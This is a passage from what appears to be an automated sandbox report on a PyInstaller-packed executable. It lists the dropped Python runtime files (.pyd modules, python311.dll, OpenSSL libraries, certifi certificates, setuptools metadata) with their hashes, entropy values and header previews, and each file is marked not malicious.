File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	50968
Entropy (8bit):	6.433137711787963
Encrypted:	false
SSDEEP:	768:A1MCcP4W1vqJiR5RMJl5XikC6r2lIsXtw5YiSyvUYAMxkEb:A1MiJifvkCllIsXti7SysGxf
MD5:	AC053EF737E4F13B02BFA81F9E46170B
SHA1:	5D8EBEB30671B74D736731696FEDC78C89DA0E1F
SHA-256:	CB68E10748E2EFD86F7495D647A2774CEA9F97AD5C6FE179F90DC1C467B9280F
SHA-512:	6AC26F63981DC5E8DFB675880D6C43648E2BBE6711C75DCAC20EBE4D8591E88FBFAC3C60660AB28602352760B6F5E1CB587075072ABD3333522E3E2549BFA02E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{.wo(.wo(.wo(...(.wo(..n).wo(..j).wo(..k).wo(..l).wo(..n).wo(.wn(.wo(..n).wo(..k).wo(..b).wo(..o).wo(...(.wo(..m).wo(Rich.wo(........................PE..d....k.d.........." ...$.B...X............................................................`.........................................0...X................................/......,....f..T...........................Pe..@............`...............................text...^A.......B.................. ..`.rdata..$5...`...6...F..............@..@.data................\|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	32536
Entropy (8bit):	6.452372346765785
Encrypted:	false
SSDEEP:	768:K+yFV6rXMmxU9tIsQUl5YiSyvYAMxkEl1C:K+wEXMWU9tIsQUr7SyexXC
MD5:	8BBED19359892F8C95C802C6AD7598E9
SHA1:	773FCA164965241F63170E7A1F3A8FA17F73EA18
SHA-256:	4E5B7C653C1B3DC3FD7519E4F39CC8A2FB2746E0ECDC4E433FE6029F5F4D9065
SHA-512:	22EA7667689A9F049FA34DDAE6B858E1AF3E646A379D2C5A4AEF3E74A4FF1A4109418B363C9BE960127F1C7E020AA393A47885BC45517C9E9AEBE71EC7CB61A0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7X.Y..Y..Y......Y.v.X..Y.v.\..Y.v.]..Y.v.Z..Y...X..Y...X..Y..X...Y...T..Y...Y..Y.....Y...[..Y.Rich.Y.........................PE..d....k.d.........." ...$.....8............................................................`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79640
Entropy (8bit):	6.290503224602847
Encrypted:	false
SSDEEP:	1536:zbflGOzI+Jmrc0r3uj+9/s+S+pzpDAiTFVf78tIsLwy7SyJx+:V/IMA3uj+9/sT+pztAYFVT8tIsLwyA
MD5:	64A6C475F59E5C57B3F4DD935F429F09
SHA1:	CA2E0719DC32F22163AE0E7B53B2CAADB0B9D023
SHA-256:	D03FA645CDE89B4B01F4A2577139FBB7E1392CB91DC26213B3B76419110D8E49
SHA-512:	CF9E03B7B34CC095FE05C465F9D794319AAA0428FE30AB4DDCE14BA78E835EDF228D11EC016FD31DFE9F09D84B6F73482FB8E0F574D1FD08943C1EC9E0584973
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.......e..N....e..N....e..N....e..N....e.......e...e..Re.......e.......e.......e....{..e.......e..Rich.e..................PE..d....l.d.........." ...$.l...........%.......................................P......e]....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...6k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120088
Entropy (8bit):	6.257365630046476
Encrypted:	false
SSDEEP:	3072:hZ1UnKJVckfKE0izBCL1F4TSlNdtAhfw5ySJQVMJFcV4qsSxRIsOQZm:hcnoVckfqjb5XJF1a4
MD5:	A7DF575BF69570944B004DFE150E8CAF
SHA1:	2FD19BE98A07347D59AFD78C167601479AAC94BB
SHA-256:	B1223420E475348C0BFB90FAE33FC44CE35D988270294158EC366893DF221A4B
SHA-512:	18C381A4DED8D33271CBF0BEA75AF1C86C6D34CC436F68FB9342951C071C10D84CF9F96A0509C53E5886D47FED5BCA113A7F7863F6873583DAA7BB6AF1AA9AFA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!..O..O..O.....O.p.N..O.p...O.p.J..O.p.K..O.p.L..O...N..O...N..O..N..O...B..O...O..O.....O...M..O.Rich.O.................PE..d....l.d.........." ...$............`...............................................7&....`..........................................Z..P....Z.........................../..............T...............................@............................................text............................... ..`.rdata..l...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	176920
Entropy (8bit):	5.954664688637172
Encrypted:	false
SSDEEP:	3072:LFIQQShnmJg0ADm8H4qIOuXo6XHFBN9d41Olh59YL48PMrN/WgAlNzn5IsC7/1a:GShmaJDm24q6o6XHR4BLrT
MD5:	A0B40F1F8FC6656C5637EACACF7021F6
SHA1:	38813E25FFDE1EEE0B8154FA34AF635186A243C1
SHA-256:	79D861F0670828DEE06C2E3523E2F9A2A90D6C6996BDE38201425AA4003119F1
SHA-512:	C18855D7C0069FFF392D422E5B01FC518BBDF497EB3390C0B333ECAC2497CD29ABBDAE4557E4F0C4E90321FBA910FC3E4D235CE62B745FA34918F40FA667B713
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@.L.@.L.@.L.8$L.@.L.>.M.@.L.>.M.@.L.>.M.@.L.>.M.@.L.?.M.@.Lw=.M.@.L.@.L A.L.8.M.@.L.?.M.@.L.?.M.@.L.?HL.@.L.?.M.@.LRich.@.L........PE..d....l.d.........." ...$............l+....................................................`.........................................0...d................................/......\|...P...T...............................@............................................text............................... ..`.rdata...".......$..................@..@.data...............................@....pdata...............\..............@..@.rsrc................h..............@..@.reloc..\|............r..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1847837
Entropy (8bit):	5.576134070292995
Encrypted:	false
SSDEEP:	24576:DQR5pATuFfR5lUKdcubgAnyPbawIBUiwhVENdYfXPWeSGTAbd2woPHH+:DQR5pnfROIRJRbQwP
MD5:	AFA940580438A53079746369BDAB944D
SHA1:	0BC17209F1770B823DC3E7B85E948CD716E2394F
SHA-256:	739F633D26F629F19B525CE7D87092B0509C6179810816289589E02334B54921
SHA-512:	BA19FCF6871E08A8DA3F70977252197F99C8BFC04C4A88620AD2E77E775A6B8F09972F564F9A99190DFE0D9DC99470E79B517F5DE0C1F0168DFE721B2458BAAC
Malicious:	false
Preview:	PK..........!.W*..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI67202\certifi\cacert.pem

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	281617
Entropy (8bit):	6.048201407322743
Encrypted:	false
SSDEEP:	6144:QW1H/M8fRR1mNplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5f:QWN/TR8NLWURrI55MWavdF0f
MD5:	78D9DD608305A97773574D1C0FB10B61
SHA1:	9E177F31A3622AD71C3D403422C9A980E563FE32
SHA-256:	794D039FFDF277C047E26F2C7D58F81A5865D8A0EB7024A0FAC1164FEA4D27CF
SHA-512:	0C2D08747712ED227B4992F6F8F3CC21168627A79E81C6E860EE2B5F711AF7F4387D3B71B390AA70A13661FC82806CC77AF8AB1E8A8DF82AD15E29E05FA911BF
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md.cp311-win_amd64.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.666005138902942
Encrypted:	false
SSDEEP:	96:KJdp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCF4ioUjQcX6g8cim1qeSju1:KJ72HzzjBbRYoe2oRcqgvimoe
MD5:	28AF0FFB49CC20FE5AF9FE8EFA49D6F1
SHA1:	2C17057C33382DDFFEA3CA589018CBA04C4E49D7
SHA-256:	F1E26EF5D12C58D652B0B5437C355A14CD66606B2FBC00339497DD00243081E0
SHA-512:	9AA99E17F20A5DD485AE43AC85842BD5270EBAB83A49E896975A8FA9F98FFC5F7585BEF84ED46BA55F40A25E224F2640E85CEBE5ACB9087CF46D178ECC8029F0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2;.vZ..vZ..vZ..."..tZ...&..tZ..="..tZ...&..}Z...&..~Z...&..uZ..&..uZ..vZ..PZ..'..wZ..'..wZ..'v.wZ..'..wZ..RichvZ..................PE..d....Z.d.........." ...#.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	113152
Entropy (8bit):	5.883508414366263
Encrypted:	false
SSDEEP:	1536:Oa+euGiytUbL3818SfqZpr0w2a5i5hBi0GmV4Ms7oTGKMl8g1d:OtezmbL38+SCZqw2aA8QV67oTGKw
MD5:	6CDCA2FDE9DF198DA58955397033AF98
SHA1:	E457C97721504D25F43B549D57E4538A62623168
SHA-256:	A4A758EABD1B2B45F3C4699BDFEBC98F196DC691C0A3D5407E17FFFFFAFC5DF7
SHA-512:	7B3C384BA9993D3192ED852191FF77BDCD3421CBC69FF636C6DEB8FE7248E066573B68D80A8F280AE0C1CB015F79967D46D910455D932EAEAC072C76D0757E92
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........KSjk%.jk%.jk%.c...bk%...$.hk%.!.$.hk%... .gk%...!.bk%...&.ik%...$.ik%.jk$..k%...-.kk%...%.kk%.....kk%...'.kk%.Richjk%.........PE..d....Z.d.........." ...#..................................................................`..........................................s..d....t..................................$....f...............................d..@............0...............................text............................... ..`.rdata..~U...0...V... ..............@..@.data...p8.......,...v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-3.dll

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5157656
Entropy (8bit):	5.95816549046812
Encrypted:	false
SSDEEP:	98304:OH+jTaoFABs2NPAE7uLcdKmj8waP31CPwDvt3uFlDC:kQ+Bs2NQcdKmj8waP1CPwDvt3uFlDC
MD5:	7A6A8C2A8C379B111CDCEB66B18D687D
SHA1:	F3B8A4C731FA0145F224112F91F046FDDF642794
SHA-256:	8E13B53EE25825B97F191D77B51ED03966F8B435773FA3FBC36F3EB668FC569B
SHA-512:	F2EF1702DF861EF55EF397AD69985D62B675D348CAB3862F6CA761F1CE3EE896F663A77D7B69B286BE64E7C69BE1215B03945781450B186FC02CFB1E4CB226B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d......d.........." ...#..6..&......v.........................................O......eO...`..........................................zG.0.....M.@.... N.s.....K......N../...0N......bC.8...........................0aC.@.............M..............................text...t.6.......6................. ..`.rdata........6.......6.............@..@.data....n....J..<...vJ.............@....pdata........K.......J.............@..@.idata...%....M..&....M.............@..@.00cfg..u.....N.......M.............@..@.rsrc...s.... N.......M.............@..@.reloc..S....0N.......M.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	39696
Entropy (8bit):	6.641880464695502
Encrypted:	false
SSDEEP:	768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
MD5:	0F8E4992CA92BAAF54CC0B43AACCCE21
SHA1:	C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
SHA-256:	EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
SHA-512:	6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-3.dll

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	789784
Entropy (8bit):	5.607345956416271
Encrypted:	false
SSDEEP:	6144:9jurAr6yUDGpdXh3Mr3r0oARnjmeUl4XOnZiRtw036WgfCBL5JyJ/OiFe9XbI:9MT6h3M7VxKXOrqdeOiFe9Xb
MD5:	64ACB046FE68D64EE475E19F67253A3C
SHA1:	D9E66C9437CE6F775189D6FDBD171635193EC4CC
SHA-256:	B21309ABD3DBBB1BF8FB6AA3C250FC85D7B0D9984BF4C942D1D4421502F31A10
SHA-512:	F8B583981DF528CF4F1854B94EFF6F51DD9D4BE91E6FA6329A8C4435B705457C868AE40EE030FA54BEBB646A37B547BC182C9CBF0DF9A07FEA03A18CF85C6766
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...T...T...].3.Z......V......V......X......\......P.....W...T...H.....e.....U...._.U.....U...RichT...................PE..d....d.........." ...#.4..........K........................................0...........`..........................................x...Q..............i.... ..\|M......./......`.......8...............................@............................................text...D3.......4.................. ..`.rdata...y...P...z...8..............@..@.data....N.......H..................@....pdata..dV... ...X..................@..@.idata...c.......d...R..............@..@.00cfg..u...........................@..@.rsrc...i...........................@..@.reloc..?...........................@..B........................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	199448
Entropy (8bit):	6.374698779434704
Encrypted:	false
SSDEEP:	3072:ZKABBH4pwa0bGheNSeFPyP7pgE7xhAq36exBce56iXfVhyAJ1Ohc2gZtIsLh5Aj:ZBBHCqGheNSe9YeE7/AqV1XfPym2yk
MD5:	CDCF0E74A32AD7DFEDA859A0CE4FCB20
SHA1:	C72B42A59BA5D83E8D481C6F05B917871B415F25
SHA-256:	91FE5B1B2DE2847946E5B3F060678971D8127DFD7D2D37603FDCD31BD5C71197
SHA-512:	C26FDF57299B2C6085F1166B49BD9608D2DD8BC804034EBB03FB2BBA6337206B6018BF7F74C069493FFAE42F2E9D6337F6F7DF5306B80B63C8C3A386BCE69EA6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.]...3...3...3.......3...2...3...6...3...7...3...0...3...2...3.L.2...3...2.s.3...>...3...3...3......3...1...3.Rich..3.........PE..d....k.d.........." ...$..................................................... ............`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5765912
Entropy (8bit):	6.089565479797802
Encrypted:	false
SSDEEP:	98304:BBduVia4N3NWLvJP8IjF/d/aHMMwuPQyFF+RdioiZPbwappjDq:BBduVv4N3ILvJ8M/4wZy3+RdioiZPbwl
MD5:	58E01ABC9C9B5C885635180ED104FE95
SHA1:	1C2F7216B125539D63BD111A7ABA615C69DEB8BA
SHA-256:	DE1B95D2E951FC048C84684BC7DF4346138910544EE335B61FC8E65F360C3837
SHA-512:	CD32C77191309D99AEED47699501B357B35669123F0DD70ED97C3791A009D1855AB27162DB24A4BD9E719B68EE3B0539EE6DB88E71ABB9A2D4D629F87BC2C081
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ed..Ed..Ed......Gd......Kd......Id......Md......Ad..L.{._d......Nd..Ed.. e.._...d.._...Dd.._...Dd.._...Dd..RichEd..................PE..d....k.d.........." ...$.`%..87......K........................................\.....nMX...`...........................................@......ZA......p[.......V..0....W../....[..B....).T...........................`.).@............p%..............................text...._%......`%................. ..`.rdata.......p%......d%.............@..@.data.........A..L...tA.............@....pdata...0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......~V.............@..@.reloc...B....[..D....V.............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30488
Entropy (8bit):	6.586478365575897
Encrypted:	false
SSDEEP:	384:dEeecReJKuHq1W57AvB0EZtIsQGQHQIYiSy1pCQvC5HAM+o/8E9VF0Ny5X3:XeUeJPHqoGDtIsQGq5YiSyvmAMxkE/3
MD5:	653BDCCB7AF2AA9CCF50CB050FD3BE64
SHA1:	AFE0A85425AE911694C250AB4CB1F6C3D3F2CC69
SHA-256:	E24A3E7885DF9A18C29BA058C49C3ADCF59E4B58107847B98ECA365B6D94F279
SHA-512:	07E841FDA7A2295380BFA05DB7A4699F18C6E639DA91D8EE2D126D4F96E4CDDAEDBD490DEB4D2A2E8E5877EDFFF877693F67A9DC487E29742943E062D7BE6277
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t..'..'..'...'..'...&..'...&..'...&..'...&..'...&..'..'..'...&..'...&..'...&..'..c'..'...&..'Rich..'........................PE..d....k.d.........." ...$.....2......................................................;.....`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\INSTALLER

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\LICENSE

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1050
Entropy (8bit):	5.072538194763298
Encrypted:	false
SSDEEP:	24:1rmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:1aJ8YHvEH5QHOs5exm3oEFJ
MD5:	7A7126E068206290F3FE9F8D6C713EA6
SHA1:	8E6689D37F82D5617B7F7F7232C94024D41066D1
SHA-256:	DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
SHA-512:	C9F0870BC5D5EFF8769D9919E6D8DDE1B773543634F7D03503A9E8F191BD4ACC00A97E0399E173785D1B65318BAC79F41D3974AE6855E5C432AC5DACF8D13E8A
Malicious:	false
Preview:	Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTW

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\METADATA

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	6301
Entropy (8bit):	5.107162422517841
Encrypted:	false
SSDEEP:	192:W4rkAIG0wRg8wbNDdq6T9927uoU/GBpHFwTZ:Sq0wRg8wbNDdBh927uoU/GBRFi
MD5:	9E59BD13BB75B38EB7962BF64AC30D6F
SHA1:	70F6A68B42695D1BFA55ACB63D8D3351352B2AAC
SHA-256:	80C7A3B78EA0DFF1F57855EE795E7D33842A0827AA1EF4EE17EC97172A80C892
SHA-512:	67AC61739692ECC249EBDC8F5E1089F68874DCD65365DB1C389FDD0CECE381591A30B99A2774B8CAAA00E104F3E35FF3745AFF6F5F0781289368398008537AE7
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: setuptools.Version: 65.5.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.7.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\RECORD

Process:	C:\Users\user\Desktop\KzqQe0QtRd.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	37694
Entropy (8bit):	5.555787611309118
Encrypted:	false
SSDEEP:	384:vSzcBlShgRUhbul9nXJkpIVh498WjXYH0+5+E/8mrnaDoaQP7IOQRJqxBPgof2yd:vc853yQXYAY8AKCT9r2/GsIVxE9Im
MD5:	087F72A04BB085627494651E36C4C513
SHA1:	1E39070E246F91D8926268A033C6F584E629E2DE
SHA-256:	BFB77A968E06417BD37023BF1A2D7F1AAE9D8E74231665D6699D5BB82BDBD7B0
SHA-512:	39CE042A20324C6B63A192D70E56B36318C45D04B810A6BD333D1D40B6DAAD947AFB9156C003BC86C700A59F0F25753416D754DA06C808814920F92582CB6058
Malicious:	false
Preview:	_distutils_hack/__init__.py,sha256=TSekhUW1fdE3rjU3b88ybSBkJxCEpIeWBob4cEuU3ko,6128.._distutils_hack/__pycache__/__init__.cpython-311.pyc,,.._distutils_hack/__pycache__/override.cpython-311.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=fT5Y3P1tcSX8sJomClUU10WHeFmvqyNZM4UZHzdpAvg,108568..pkg_resources/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-311.pyc,,..pkg_resources/_vendor/appdirs.py,sha256=MievUEuv3l_mQISH5SF0shDk_BNhHHzYiAPrT3ITN4I,24701..pkg_resources/_vendor/importlib_resources/__init__.py,sha256=evPm12kLgYqTm-pbzm60bOuumumT8IpBNWFp0uMyrzE,506..pkg_resources/_vendor/importli

C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info\WHEEL

